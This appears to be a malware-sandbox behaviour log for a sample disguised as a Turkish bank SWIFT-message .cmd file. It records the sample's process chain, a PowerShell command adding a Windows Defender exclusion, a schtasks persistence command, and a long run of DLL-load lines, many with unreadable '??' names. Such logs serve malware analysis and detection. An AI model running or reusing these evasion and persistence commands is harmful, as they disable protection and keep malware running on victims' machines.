Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9170.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9170.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??????p.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
